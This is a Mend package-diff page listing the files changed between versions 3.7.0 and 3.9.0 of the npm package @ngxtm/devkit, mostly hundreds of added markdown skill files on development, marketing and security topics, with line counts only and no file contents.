npm - @ngxtm/devkit - Versions diffs - 3.7.0 → 3.9.0 - Mend

@ngxtm/devkit 3.7.0 → 3.9.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (772) hide show

package/cli/init.js +23 -7
package/cli/update.js +21 -6
package/merged-commands/3d-web-experience.md +254 -0
package/merged-commands/ab-test-setup.md +232 -0
package/merged-commands/accessibility-compliance-accessibility-audit.md +42 -0
package/merged-commands/active-directory-attacks.md +383 -0
package/merged-commands/address-github-comments.md +55 -0
package/merged-commands/aesthetic.md +134 -0
package/merged-commands/agent-evaluation.md +64 -0
package/merged-commands/agent-framework-azure-hosted-agents.md +332 -0
package/merged-commands/agent-manager-skill.md +40 -0
package/merged-commands/agent-memory-mcp.md +82 -0
package/merged-commands/agent-memory-systems.md +67 -0
package/merged-commands/agent-orchestration-improve-agent.md +349 -0
package/merged-commands/agent-orchestration-multi-agent-optimize.md +239 -0
package/merged-commands/agent-tool-builder.md +53 -0
package/merged-commands/agile-product-owner.md +31 -0
package/merged-commands/ai-agents-architect.md +90 -0
package/merged-commands/ai-artist.md +75 -0
package/merged-commands/ai-engineer.md +171 -0
package/merged-commands/ai-multimodal.md +109 -0
package/merged-commands/ai-product.md +54 -0
package/merged-commands/ai-wrapper-product.md +273 -0
package/merged-commands/airflow-dag-patterns.md +41 -0
package/merged-commands/algolia-search.md +66 -0
package/merged-commands/algorithmic-art.md +405 -0
package/merged-commands/analytics-tracking.md +404 -0
package/merged-commands/angular-architect.md +97 -0
package/merged-commands/angular-migration.md +428 -0
package/merged-commands/anti-reversing-techniques.md +42 -0
package/merged-commands/api-design-principles.md +37 -0
package/merged-commands/api-designer.md +101 -0
package/merged-commands/api-documentation-generator.md +484 -0
package/merged-commands/api-documenter.md +184 -0
package/merged-commands/api-fuzzing-bug-bounty.md +433 -0
package/merged-commands/api-patterns.md +81 -0
package/merged-commands/api-security-best-practices.md +907 -0
package/merged-commands/api-testing-observability-api-mock.md +46 -0
package/merged-commands/app-builder.md +75 -0
package/merged-commands/app-store-optimization.md +403 -0
package/merged-commands/application-performance-performance-optimization.md +154 -0
package/merged-commands/architect-review.md +174 -0
package/merged-commands/architecture-decision-records.md +441 -0
package/merged-commands/architecture-designer.md +89 -0
package/merged-commands/architecture-patterns.md +37 -0
package/merged-commands/architecture.md +55 -0
package/merged-commands/arm-cortex-expert.md +306 -0
package/merged-commands/artifacts-builder.md +74 -0
package/merged-commands/ask-questions-if-underspecified.md +81 -0
package/merged-commands/async-python-patterns.md +39 -0
package/merged-commands/atlassian-mcp.md +100 -0
package/merged-commands/attack-tree-construction.md +38 -0
package/merged-commands/auth-implementation-patterns.md +39 -0
package/merged-commands/automate-whatsapp.md +257 -0
package/merged-commands/autonomous-agent-patterns.md +761 -0
package/merged-commands/autonomous-agents.md +68 -0
package/merged-commands/avalonia-layout-zafiro.md +59 -0
package/merged-commands/avalonia-viewmodels-zafiro.md +29 -0
package/merged-commands/avalonia-zafiro-development.md +29 -0
package/merged-commands/aws-agentic-ai.md +117 -0
package/merged-commands/aws-cdk-development.md +278 -0
package/merged-commands/aws-cost-operations.md +317 -0
package/merged-commands/aws-penetration-testing.md +405 -0
package/merged-commands/aws-serverless-eda.md +757 -0
package/merged-commands/aws-serverless.md +323 -0
package/merged-commands/aws-skills.md +22 -0
package/merged-commands/azd-deployment.md +296 -0
package/merged-commands/azure-ai-agents-python.md +277 -0
package/merged-commands/azure-ai-search-python.md +198 -0
package/merged-commands/azure-ai-voicelive-skill.md +294 -0
package/merged-commands/azure-functions.md +42 -0
package/merged-commands/backend-architect.md +333 -0
package/merged-commands/backend-dev-guidelines.md +342 -0
package/merged-commands/backend-development-feature-development.md +180 -0
package/merged-commands/backend-development.md +155 -0
package/merged-commands/backend-security-coder.md +156 -0
package/merged-commands/backtesting-frameworks.md +39 -0
package/merged-commands/bash-defensive-patterns.md +43 -0
package/merged-commands/bash-linux.md +199 -0
package/merged-commands/bash-pro.md +310 -0
package/merged-commands/bats-testing-patterns.md +34 -0
package/merged-commands/bazel-build-optimization.md +397 -0
package/merged-commands/beautiful-prose.md +22 -0
package/merged-commands/behavioral-modes.md +242 -0
package/merged-commands/best-practices.md +500 -0
package/merged-commands/better-auth.md +204 -0
package/merged-commands/billing-automation.md +42 -0
package/merged-commands/binary-analysis-patterns.md +450 -0
package/merged-commands/blockchain-developer.md +208 -0
package/merged-commands/blockrun.md +292 -0
package/merged-commands/brainstorming.md +230 -0
package/merged-commands/brand-guidelines-anthropic.md +73 -0
package/merged-commands/brand-guidelines-community.md +73 -0
package/merged-commands/brand-guidelines.md +73 -0
package/merged-commands/broken-authentication.md +476 -0
package/merged-commands/browser-automation.md +70 -0
package/merged-commands/browser-extension-builder.md +261 -0
package/merged-commands/building-ai-agent-on-cloudflare.md +391 -0
package/merged-commands/building-mcp-server-on-cloudflare.md +265 -0
package/merged-commands/bullmq-specialist.md +57 -0
package/merged-commands/bun-development.md +691 -0
package/merged-commands/burp-suite-testing.md +380 -0
package/merged-commands/business-analyst.md +182 -0
package/merged-commands/busybox-on-windows.md +30 -0
package/merged-commands/c-pro.md +56 -0
package/merged-commands/c4-architecture-c4-architecture.md +389 -0
package/merged-commands/c4-code.md +244 -0
package/merged-commands/c4-component.md +153 -0
package/merged-commands/c4-container.md +171 -0
package/merged-commands/c4-context.md +150 -0
package/merged-commands/canvas-design.md +130 -0
package/merged-commands/cc-skill-backend-patterns.md +584 -0
package/merged-commands/cc-skill-clickhouse-io.md +431 -0
package/merged-commands/cc-skill-coding-standards.md +522 -0
package/merged-commands/cc-skill-continuous-learning.md +10 -0
package/merged-commands/cc-skill-frontend-patterns.md +633 -0
package/merged-commands/cc-skill-project-guidelines-example.md +352 -0
package/merged-commands/cc-skill-security-review.md +496 -0
package/merged-commands/cc-skill-strategic-compact.md +10 -0
package/merged-commands/changelog-automation.md +38 -0
package/merged-commands/changelog-generator.md +104 -0
package/merged-commands/chaos-engineer.md +98 -0
package/merged-commands/chrome-devtools.md +407 -0
package/merged-commands/cicd-automation-workflow-automate.md +51 -0
package/merged-commands/clarity-gate.md +22 -0
package/merged-commands/claude-ally-health.md +22 -0
package/merged-commands/claude-code-guide.md +68 -0
package/merged-commands/claude-d3js-skill.md +820 -0
package/merged-commands/claude-scientific-skills.md +22 -0
package/merged-commands/claude-speed-reader.md +22 -0
package/merged-commands/claude-win11-speckit-update-skill.md +22 -0
package/merged-commands/clean-code.md +201 -0
package/merged-commands/clerk-auth.md +56 -0
package/merged-commands/cli-developer.md +97 -0
package/merged-commands/cloud-architect.md +135 -0
package/merged-commands/cloud-penetration-testing.md +501 -0
package/merged-commands/cloudflare-expert.md +227 -0
package/merged-commands/code-documentation-code-explain.md +46 -0
package/merged-commands/code-documentation-doc-generate.md +48 -0
package/merged-commands/code-documentation.md +263 -0
package/merged-commands/code-documenter.md +95 -0
package/merged-commands/code-refactoring-context-restore.md +179 -0
package/merged-commands/code-refactoring-refactor-clean.md +51 -0
package/merged-commands/code-refactoring-tech-debt.md +386 -0
package/merged-commands/code-refactoring.md +209 -0
package/merged-commands/code-review-ai-ai-review.md +450 -0
package/merged-commands/code-review-checklist.md +444 -0
package/merged-commands/code-review-excellence.md +40 -0
package/merged-commands/code-review.md +121 -0
package/merged-commands/code-reviewer.md +178 -0
package/merged-commands/codebase-cleanup-deps-audit.md +51 -0
package/merged-commands/codebase-cleanup-refactor-clean.md +51 -0
package/merged-commands/codebase-cleanup-tech-debt.md +386 -0
package/merged-commands/codex-review.md +37 -0
package/merged-commands/commit.md +171 -0
package/merged-commands/competitive-ads-extractor.md +293 -0
package/merged-commands/competitive-landscape.md +34 -0
package/merged-commands/competitor-alternatives.md +750 -0
package/merged-commands/comprehensive-review-full-review.md +146 -0
package/merged-commands/comprehensive-review-pr-enhance.md +46 -0
package/merged-commands/computer-use-agents.md +315 -0
package/merged-commands/concise-planning.md +62 -0
package/merged-commands/conductor-implement.md +388 -0
package/merged-commands/conductor-manage.md +39 -0
package/merged-commands/conductor-new-track.md +433 -0
package/merged-commands/conductor-revert.md +372 -0
package/merged-commands/conductor-setup.md +426 -0
package/merged-commands/conductor-status.md +338 -0
package/merged-commands/conductor-validator.md +62 -0
package/merged-commands/content-creator.md +248 -0
package/merged-commands/content-marketer.md +170 -0
package/merged-commands/content-research-writer.md +538 -0
package/merged-commands/context-compression.md +266 -0
package/merged-commands/context-degradation.md +238 -0
package/merged-commands/context-driven-development.md +400 -0
package/merged-commands/context-engineering.md +107 -0
package/merged-commands/context-fundamentals.md +192 -0
package/merged-commands/context-management-context-restore.md +179 -0
package/merged-commands/context-management-context-save.md +177 -0
package/merged-commands/context-manager.md +185 -0
package/merged-commands/context-optimization.md +186 -0
package/merged-commands/context-window-management.md +53 -0
package/merged-commands/context7-auto-research.md +36 -0
package/merged-commands/conversation-memory.md +61 -0
package/merged-commands/copy-editing.md +439 -0
package/merged-commands/copywriting.md +225 -0
package/merged-commands/core-components.md +264 -0
package/merged-commands/cosmos-db-python-skill.md +198 -0
package/merged-commands/cost-optimization.md +286 -0
package/merged-commands/cpp-pro.md +59 -0
package/merged-commands/cqrs-implementation.md +35 -0
package/merged-commands/create-pr.md +192 -0
package/merged-commands/crewai.md +243 -0
package/merged-commands/csharp-developer.md +94 -0
package/merged-commands/csharp-pro.md +59 -0
package/merged-commands/culture-index.md +43 -0
package/merged-commands/customer-support.md +170 -0
package/merged-commands/daily-news-report.md +356 -0
package/merged-commands/data-engineer.md +224 -0
package/merged-commands/data-engineering-data-driven-feature.md +182 -0
package/merged-commands/data-engineering-data-pipeline.md +201 -0
package/merged-commands/data-quality-frameworks.md +40 -0
package/merged-commands/data-scientist.md +199 -0
package/merged-commands/data-storytelling.md +465 -0
package/merged-commands/database-admin.md +165 -0
package/merged-commands/database-architect.md +268 -0
package/merged-commands/database-cloud-optimization-cost-optimize.md +44 -0
package/merged-commands/database-design.md +52 -0
package/merged-commands/database-migration.md +436 -0
package/merged-commands/database-migrations-migration-observability.md +420 -0
package/merged-commands/database-migrations-sql-migrations.md +53 -0
package/merged-commands/database-optimizer.md +167 -0
package/merged-commands/databases.md +232 -0
package/merged-commands/dbt-transformation-patterns.md +34 -0
package/merged-commands/debugger.md +49 -0
package/merged-commands/debugging-strategies.md +34 -0
package/merged-commands/debugging-toolkit-smart-debug.md +197 -0
package/merged-commands/debugging-wizard.md +93 -0
package/merged-commands/debugging.md +84 -0
package/merged-commands/deep-research.md +114 -0
package/merged-commands/defi-protocol-templates.md +466 -0
package/merged-commands/dependency-management-deps-audit.md +44 -0
package/merged-commands/dependency-upgrade.md +421 -0
package/merged-commands/deployment-engineer.md +170 -0
package/merged-commands/deployment-pipeline-design.md +371 -0
package/merged-commands/deployment-procedures.md +241 -0
package/merged-commands/deployment-validation-config-validate.md +496 -0
package/merged-commands/design-md.md +178 -0
package/merged-commands/design-orchestration.md +167 -0
package/merged-commands/developer-growth-analysis.md +322 -0
package/merged-commands/devops-engineer.md +92 -0
package/merged-commands/devops-troubleshooter.md +161 -0
package/merged-commands/devops.md +285 -0
package/merged-commands/discord-bot-architect.md +277 -0
package/merged-commands/dispatching-parallel-agents.md +180 -0
package/merged-commands/distributed-debugging-debug-trace.md +44 -0
package/merged-commands/distributed-tracing.md +450 -0
package/merged-commands/django-expert.md +89 -0
package/merged-commands/django-pro.md +180 -0
package/merged-commands/doc-coauthoring.md +375 -0
package/merged-commands/docker-expert.md +409 -0
package/merged-commands/docs-architect.md +98 -0
package/merged-commands/docs-seeker.md +102 -0
package/merged-commands/documentation-generation-doc-generate.md +48 -0
package/merged-commands/documentation-templates.md +194 -0
package/merged-commands/docx-official.md +197 -0
package/merged-commands/docx.md +197 -0
package/merged-commands/domain-name-brainstormer.md +212 -0
package/merged-commands/dotnet-architect.md +197 -0
package/merged-commands/dotnet-backend-patterns.md +37 -0
package/merged-commands/dotnet-core-expert.md +96 -0
package/merged-commands/dx-optimizer.md +83 -0
package/merged-commands/e2e-testing-patterns.md +41 -0
package/merged-commands/elixir-pro.md +59 -0
package/merged-commands/email-sequence.md +925 -0
package/merged-commands/email-systems.md +54 -0
package/merged-commands/embedded-systems.md +98 -0
package/merged-commands/embedding-strategies.md +491 -0
package/merged-commands/employment-contract-templates.md +39 -0
package/merged-commands/environment-setup-guide.md +479 -0
package/merged-commands/error-debugging-error-analysis.md +47 -0
package/merged-commands/error-debugging-error-trace.md +43 -0
package/merged-commands/error-debugging-multi-agent-review.md +216 -0
package/merged-commands/error-detective.md +53 -0
package/merged-commands/error-diagnostics-error-analysis.md +47 -0
package/merged-commands/error-diagnostics-error-trace.md +48 -0
package/merged-commands/error-diagnostics-smart-debug.md +197 -0
package/merged-commands/error-handling-patterns.md +35 -0
package/merged-commands/ethical-hacking-methodology.md +466 -0
package/merged-commands/evaluation.md +238 -0
package/merged-commands/event-sourcing-architect.md +58 -0
package/merged-commands/event-store-design.md +449 -0
package/merged-commands/exa-search.md +36 -0
package/merged-commands/executing-plans.md +76 -0
package/merged-commands/expo-app-design.md +22 -0
package/merged-commands/expo-deployment.md +72 -0
package/merged-commands/fal-audio.md +22 -0
package/merged-commands/fal-generate.md +22 -0
package/merged-commands/fal-image-edit.md +22 -0
package/merged-commands/fal-platform.md +22 -0
package/merged-commands/fal-upscale.md +22 -0
package/merged-commands/fal-workflow.md +22 -0
package/merged-commands/fastapi-expert.md +93 -0
package/merged-commands/fastapi-pro.md +192 -0
package/merged-commands/fastapi-router.md +52 -0
package/merged-commands/fastapi-templates.md +32 -0
package/merged-commands/feature-forge.md +90 -0
package/merged-commands/ffuf-claude-skill.md +22 -0
package/merged-commands/file-organizer.md +250 -0
package/merged-commands/file-path-traversal.md +486 -0
package/merged-commands/file-uploads.md +22 -0
package/merged-commands/find-bugs.md +86 -0
package/merged-commands/fine-tuning-expert.md +98 -0
package/merged-commands/finishing-a-development-branch.md +200 -0
package/merged-commands/firebase.md +56 -0
package/merged-commands/firecrawl-scraper.md +37 -0
package/merged-commands/firmware-analyst.md +320 -0
package/merged-commands/fix-review.md +53 -0
package/merged-commands/fixing.md +72 -0
package/merged-commands/flutter-expert.md +200 -0
package/merged-commands/form-cro.md +441 -0
package/merged-commands/foundry-iq-agent.md +15 -0
package/merged-commands/foundry-iq-python.md +275 -0
package/merged-commands/foundry-nextgen-frontend.md +555 -0
package/merged-commands/foundry-sdk-python.md +290 -0
package/merged-commands/fp-ts-errors.md +856 -0
package/merged-commands/fp-ts-pragmatic.md +598 -0
package/merged-commands/fp-ts-react.md +796 -0
package/merged-commands/framework-migration-code-migrate.md +48 -0
package/merged-commands/framework-migration-deps-upgrade.md +48 -0
package/merged-commands/framework-migration-legacy-modernize.md +132 -0
package/merged-commands/free-tool-strategy.md +576 -0
package/merged-commands/frontend-design.md +272 -0
package/merged-commands/frontend-dev-guidelines.md +359 -0
package/merged-commands/frontend-developer.md +171 -0
package/merged-commands/frontend-development.md +399 -0
package/merged-commands/frontend-mobile-development-component-scaffold.md +403 -0
package/merged-commands/frontend-mobile-security-xss-scan.md +322 -0
package/merged-commands/frontend-security-coder.md +170 -0
package/merged-commands/frontend-slides.md +770 -0
package/merged-commands/full-stack-orchestration-full-stack-feature.md +135 -0
package/merged-commands/fullstack-guardian.md +99 -0
package/merged-commands/game-developer.md +94 -0
package/merged-commands/game-development.md +167 -0
package/merged-commands/gcp-cloud-run.md +288 -0
package/merged-commands/gdpr-data-handling.md +33 -0
package/merged-commands/geo-fundamentals.md +156 -0
package/merged-commands/git-advanced-workflows.md +412 -0
package/merged-commands/git-pr-workflows-git-workflow.md +140 -0
package/merged-commands/git-pr-workflows-onboard.md +416 -0
package/merged-commands/git-pr-workflows-pr-enhance.md +48 -0
package/merged-commands/git-pushing.md +33 -0
package/merged-commands/github-actions-templates.md +345 -0
package/merged-commands/github-workflow-automation.md +846 -0
package/merged-commands/gitlab-ci-patterns.md +283 -0
package/merged-commands/gitops-workflow.md +303 -0
package/merged-commands/go-concurrency-patterns.md +33 -0
package/merged-commands/godot-gdscript-patterns.md +33 -0
package/merged-commands/golang-pro.md +179 -0
package/merged-commands/google-adk-python.md +243 -0
package/merged-commands/grafana-dashboards.md +381 -0
package/merged-commands/graphql-architect.md +182 -0
package/merged-commands/graphql.md +68 -0
package/merged-commands/haskell-pro.md +56 -0
package/merged-commands/helm-chart-scaffolding.md +34 -0
package/merged-commands/hr-pro.md +126 -0
package/merged-commands/html-injection-testing.md +498 -0
package/merged-commands/hubspot-integration.md +42 -0
package/merged-commands/hugging-face-cli.md +198 -0
package/merged-commands/hugging-face-jobs.md +1038 -0
package/merged-commands/hybrid-cloud-architect.md +168 -0
package/merged-commands/hybrid-cloud-networking.md +238 -0
package/merged-commands/hybrid-search-implementation.md +32 -0
package/merged-commands/i18n-localization.md +154 -0
package/merged-commands/idor-testing.md +442 -0
package/merged-commands/image-enhancer.md +99 -0
package/merged-commands/imagen.md +77 -0
package/merged-commands/incident-responder.md +213 -0
package/merged-commands/incident-response-incident-response.md +168 -0
package/merged-commands/incident-response-smart-fix.md +29 -0
package/merged-commands/incident-runbook-templates.md +395 -0
package/merged-commands/infinite-gratitude.md +26 -0
package/merged-commands/inngest.md +55 -0
package/merged-commands/interactive-portfolio.md +223 -0
package/merged-commands/internal-comms-anthropic.md +32 -0
package/merged-commands/internal-comms-community.md +32 -0
package/merged-commands/internal-comms.md +32 -0
package/merged-commands/invoice-organizer.md +446 -0
package/merged-commands/ios-developer.md +219 -0
package/merged-commands/issue-creator.md +137 -0
package/merged-commands/istio-traffic-management.md +337 -0
package/merged-commands/iterate-pr.md +150 -0
package/merged-commands/java-architect.md +95 -0
package/merged-commands/java-pro.md +177 -0
package/merged-commands/javascript-mastery.md +645 -0
package/merged-commands/javascript-pro.md +57 -0
package/merged-commands/javascript-testing-patterns.md +35 -0
package/merged-commands/javascript-typescript-typescript-scaffold.md +361 -0
package/merged-commands/javascript-typescript.md +142 -0
package/merged-commands/jira-issues.md +181 -0
package/merged-commands/job-application.md +90 -0
package/merged-commands/julia-pro.md +209 -0
package/merged-commands/k8s-manifest-generator.md +35 -0
package/merged-commands/k8s-security-policies.md +346 -0
package/merged-commands/kaizen.md +730 -0
package/merged-commands/kotlin-specialist.md +94 -0
package/merged-commands/kpi-dashboard-design.md +440 -0
package/merged-commands/kubernetes-architect.md +170 -0
package/merged-commands/kubernetes-specialist.md +117 -0
package/merged-commands/langchain-architecture.md +350 -0
package/merged-commands/langfuse.md +238 -0
package/merged-commands/langgraph.md +287 -0
package/merged-commands/laravel-specialist.md +101 -0
package/merged-commands/last30days.md +421 -0
package/merged-commands/launch-strategy.md +344 -0
package/merged-commands/lead-research-assistant.md +199 -0
package/merged-commands/learn.md +476 -0
package/merged-commands/legacy-modernizer.md +53 -0
package/merged-commands/legal-advisor.md +70 -0
package/merged-commands/linear-claude-skill.md +543 -0
package/merged-commands/linkerd-patterns.md +321 -0
package/merged-commands/lint-and-validate.md +45 -0
package/merged-commands/linux-privilege-escalation.md +504 -0
package/merged-commands/linux-shell-scripting.md +504 -0
package/merged-commands/llm-app-patterns.md +760 -0
package/merged-commands/llm-application-dev-ai-assistant.md +35 -0
package/merged-commands/llm-application-dev-langchain-agent.md +246 -0
package/merged-commands/llm-application-dev-prompt-optimize.md +37 -0
package/merged-commands/llm-application-dev.md +216 -0
package/merged-commands/llm-evaluation.md +483 -0
package/merged-commands/loki-mode.md +721 -0
package/merged-commands/machine-learning-ops-ml-pipeline.md +314 -0
package/merged-commands/makepad-skills.md +22 -0
package/merged-commands/malware-analyst.md +247 -0
package/merged-commands/markdown-novel-viewer.md +281 -0
package/merged-commands/market-sizing-analysis.md +425 -0
package/merged-commands/marketing-ideas.md +221 -0
package/merged-commands/marketing-psychology.md +255 -0
package/merged-commands/mcp-builder.md +236 -0
package/merged-commands/mcp-developer.md +94 -0
package/merged-commands/mcp-management.md +209 -0
package/merged-commands/media-processing.md +358 -0
package/merged-commands/meeting-insights-analyzer.md +327 -0
package/merged-commands/memory-forensics.md +491 -0
package/merged-commands/memory-safety-patterns.md +33 -0
package/merged-commands/memory-systems.md +228 -0
package/merged-commands/mermaid-expert.md +59 -0
package/merged-commands/mermaidjs-v11.md +115 -0
package/merged-commands/metasploit-framework.md +478 -0
package/merged-commands/micro-saas-launcher.md +212 -0
package/merged-commands/microservices-architect.md +102 -0
package/merged-commands/microservices-patterns.md +35 -0
package/merged-commands/minecraft-bukkit-pro.md +126 -0
package/merged-commands/ml-engineer.md +168 -0
package/merged-commands/ml-pipeline-workflow.md +257 -0
package/merged-commands/ml-pipeline.md +111 -0
package/merged-commands/mlops-engineer.md +219 -0
package/merged-commands/mobile-design.md +284 -0
package/merged-commands/mobile-developer.md +205 -0
package/merged-commands/mobile-development.md +212 -0
package/merged-commands/mobile-security-coder.md +184 -0
package/merged-commands/modern-javascript-patterns.md +35 -0
package/merged-commands/monitoring-expert.md +92 -0
package/merged-commands/monorepo-architect.md +61 -0
package/merged-commands/monorepo-management.md +35 -0
package/merged-commands/moodle-external-api-development.md +597 -0
package/merged-commands/mtls-configuration.md +359 -0
package/merged-commands/multi-agent-brainstorming.md +256 -0
package/merged-commands/multi-agent-patterns.md +262 -0
package/merged-commands/multi-cloud-architecture.md +189 -0
package/merged-commands/multi-platform-apps-multi-platform.md +203 -0
package/merged-commands/n8n-code-python.md +750 -0
package/merged-commands/n8n-mcp-tools-expert.md +654 -0
package/merged-commands/n8n-node-configuration.md +796 -0
package/merged-commands/nanobanana-ppt-skills.md +22 -0
package/merged-commands/neon-postgres.md +56 -0
package/merged-commands/nestjs-expert.md +552 -0
package/merged-commands/network-101.md +342 -0
package/merged-commands/network-engineer.md +169 -0
package/merged-commands/nextjs-app-router-patterns.md +33 -0
package/merged-commands/nextjs-best-practices.md +203 -0
package/merged-commands/nextjs-developer.md +97 -0
package/merged-commands/nextjs-supabase-auth.md +56 -0
package/merged-commands/nft-standards.md +395 -0
package/merged-commands/nodejs-backend-patterns.md +35 -0
package/merged-commands/nodejs-best-practices.md +333 -0
package/merged-commands/nosql-expert.md +111 -0
package/merged-commands/notebooklm-skill.md +269 -0
package/merged-commands/notebooklm.md +269 -0
package/merged-commands/notion-template-business.md +216 -0
package/merged-commands/nx-workspace-patterns.md +464 -0
package/merged-commands/observability-engineer.md +237 -0
package/merged-commands/observability-monitoring-monitor-setup.md +48 -0
package/merged-commands/observability-monitoring-slo-implement.md +43 -0
package/merged-commands/observe-whatsapp.md +109 -0
package/merged-commands/obsidian-clipper-template-creator.md +64 -0
package/merged-commands/on-call-handoff-patterns.md +453 -0
package/merged-commands/onboarding-cro.md +433 -0
package/merged-commands/openapi-spec-generation.md +33 -0
package/merged-commands/page-cro.md +343 -0
package/merged-commands/paid-ads.md +551 -0
package/merged-commands/pandas-pro.md +96 -0
package/merged-commands/parallel-agents.md +175 -0
package/merged-commands/payment-integration.md +77 -0
package/merged-commands/paypal-integration.md +479 -0
package/merged-commands/paywall-upgrade-cro.md +570 -0
package/merged-commands/pci-compliance.md +478 -0
package/merged-commands/pdf-official.md +294 -0
package/merged-commands/pdf.md +294 -0
package/merged-commands/pentest-checklist.md +334 -0
package/merged-commands/pentest-commands.md +438 -0
package/merged-commands/performance-engineer.md +180 -0
package/merged-commands/performance-profiling.md +143 -0
package/merged-commands/performance-testing-review-ai-review.md +450 -0
package/merged-commands/performance-testing-review-multi-agent-review.md +216 -0
package/merged-commands/personal-tool-builder.md +289 -0
package/merged-commands/php-pro.md +63 -0
package/merged-commands/plaid-fintech.md +50 -0
package/merged-commands/plan-writing.md +152 -0
package/merged-commands/planning-with-files.md +211 -0
package/merged-commands/planning.md +95 -0
package/merged-commands/plans-kanban.md +166 -0
package/merged-commands/playwright-expert.md +87 -0
package/merged-commands/playwright-skill.md +453 -0
package/merged-commands/podcast-generation.md +121 -0
package/merged-commands/popup-cro.md +346 -0
package/merged-commands/posix-shell-pro.md +304 -0
package/merged-commands/postgres-best-practices.md +57 -0
package/merged-commands/postgres-pro.md +98 -0
package/merged-commands/postgresql.md +230 -0
package/merged-commands/postmortem-writing.md +386 -0
package/merged-commands/powershell-windows.md +167 -0
package/merged-commands/pptx-official.md +484 -0
package/merged-commands/pptx.md +484 -0
package/merged-commands/pricing-strategy.md +356 -0
package/merged-commands/prisma-expert.md +355 -0
package/merged-commands/privilege-escalation-methods.md +333 -0
package/merged-commands/problem-solving.md +96 -0
package/merged-commands/product-manager-toolkit.md +351 -0
package/merged-commands/product-strategist.md +26 -0
package/merged-commands/production-code-audit.md +540 -0
package/merged-commands/programmatic-seo.md +351 -0
package/merged-commands/projection-patterns.md +33 -0
package/merged-commands/prometheus-configuration.md +404 -0
package/merged-commands/prompt-caching.md +61 -0
package/merged-commands/prompt-engineer.md +272 -0
package/merged-commands/prompt-engineering-patterns.md +213 -0
package/merged-commands/prompt-engineering.md +171 -0
package/merged-commands/prompt-library.md +322 -0
package/merged-commands/protocol-reverse-engineering.md +29 -0
package/merged-commands/pydantic-models.md +58 -0
package/merged-commands/pypict-skill.md +22 -0
package/merged-commands/python-development-python-scaffold.md +331 -0
package/merged-commands/python-development.md +139 -0
package/merged-commands/python-packaging.md +36 -0
package/merged-commands/python-patterns.md +441 -0
package/merged-commands/python-performance-optimization.md +36 -0
package/merged-commands/python-pro.md +158 -0
package/merged-commands/python-testing-patterns.md +37 -0
package/merged-commands/qa-regression.md +337 -0
package/merged-commands/quant-analyst.md +53 -0
package/merged-commands/radix-ui-design-system.md +847 -0
package/merged-commands/raffle-winner-picker.md +159 -0
package/merged-commands/rag-architect.md +100 -0
package/merged-commands/rag-engineer.md +90 -0
package/merged-commands/rag-implementation.md +421 -0
package/merged-commands/rails-expert.md +97 -0
package/merged-commands/react-best-practices.md +121 -0
package/merged-commands/react-expert.md +98 -0
package/merged-commands/react-flow-node.md +66 -0
package/merged-commands/react-modernization.md +34 -0
package/merged-commands/react-native-architecture.md +33 -0
package/merged-commands/react-native-expert.md +88 -0
package/merged-commands/react-patterns.md +198 -0
package/merged-commands/react-state-management.md +441 -0
package/merged-commands/react-ui-patterns.md +289 -0
package/merged-commands/readme.md +775 -0
package/merged-commands/receiving-code-review.md +213 -0
package/merged-commands/red-team-tactics.md +199 -0
package/merged-commands/red-team-tools.md +310 -0
package/merged-commands/reference-builder.md +188 -0
package/merged-commands/referral-program.md +602 -0
package/merged-commands/remotion-best-practices.md +45 -0
package/merged-commands/repomix.md +275 -0
package/merged-commands/requesting-code-review.md +105 -0
package/merged-commands/research-engineer.md +135 -0
package/merged-commands/research.md +191 -0
package/merged-commands/reverse-engineer.md +173 -0
package/merged-commands/risk-manager.md +61 -0
package/merged-commands/risk-metrics-calculation.md +33 -0
package/merged-commands/ruby-pro.md +56 -0
package/merged-commands/rust-async-patterns.md +33 -0
package/merged-commands/rust-engineer.md +96 -0
package/merged-commands/rust-pro.md +178 -0
package/merged-commands/saga-orchestration.md +496 -0
package/merged-commands/sales-automator.md +55 -0
package/merged-commands/salesforce-developer.md +105 -0
package/merged-commands/salesforce-development.md +51 -0
package/merged-commands/sast-configuration.md +212 -0
package/merged-commands/scala-pro.md +82 -0
package/merged-commands/scanning-tools.md +589 -0
package/merged-commands/schema-markup.md +360 -0
package/merged-commands/screen-reader-testing.md +33 -0
package/merged-commands/screenshots.md +401 -0
package/merged-commands/scroll-experience.md +263 -0
package/merged-commands/search-specialist.md +80 -0
package/merged-commands/secrets-management.md +364 -0
package/merged-commands/secure-code-guardian.md +93 -0
package/merged-commands/security-auditor.md +169 -0
package/merged-commands/security-bluebook-builder.md +22 -0
package/merged-commands/security-compliance-compliance-check.md +55 -0
package/merged-commands/security-requirement-extraction.md +33 -0
package/merged-commands/security-reviewer.md +94 -0
package/merged-commands/security-scanning-security-dependencies.md +43 -0
package/merged-commands/security-scanning-security-hardening.md +147 -0
package/merged-commands/security-scanning-security-sast.md +495 -0
package/merged-commands/segment-cdp.md +50 -0
package/merged-commands/senior-architect.md +209 -0
package/merged-commands/senior-backend.md +209 -0
package/merged-commands/senior-computer-vision.md +226 -0
package/merged-commands/senior-data-engineer.md +226 -0
package/merged-commands/senior-data-scientist.md +226 -0
package/merged-commands/senior-devops.md +209 -0
package/merged-commands/senior-frontend.md +209 -0
package/merged-commands/senior-fullstack.md +209 -0
package/merged-commands/senior-ml-engineer.md +226 -0
package/merged-commands/senior-prompt-engineer.md +226 -0
package/merged-commands/senior-qa.md +209 -0
package/merged-commands/senior-secops.md +209 -0
package/merged-commands/senior-security.md +209 -0
package/merged-commands/seo-audit.md +487 -0
package/merged-commands/seo-authority-builder.md +136 -0
package/merged-commands/seo-cannibalization-detector.md +123 -0
package/merged-commands/seo-content-auditor.md +83 -0
package/merged-commands/seo-content-planner.md +108 -0
package/merged-commands/seo-content-refresher.md +118 -0
package/merged-commands/seo-content-writer.md +96 -0
package/merged-commands/seo-fundamentals.md +173 -0
package/merged-commands/seo-keyword-strategist.md +95 -0
package/merged-commands/seo-meta-optimizer.md +92 -0
package/merged-commands/seo-snippet-hunter.md +114 -0
package/merged-commands/seo-structure-architect.md +108 -0
package/merged-commands/sequential-thinking.md +94 -0
package/merged-commands/server-management.md +161 -0
package/merged-commands/service-mesh-expert.md +58 -0
package/merged-commands/service-mesh-observability.md +395 -0
package/merged-commands/sharp-edges.md +70 -0
package/merged-commands/shellcheck-configuration.md +466 -0
package/merged-commands/shodan-reconnaissance.md +503 -0
package/merged-commands/shopify-apps.md +42 -0
package/merged-commands/shopify-development.md +366 -0
package/merged-commands/shopify-expert.md +102 -0
package/merged-commands/signup-flow-cro.md +355 -0
package/merged-commands/similarity-search-patterns.md +33 -0
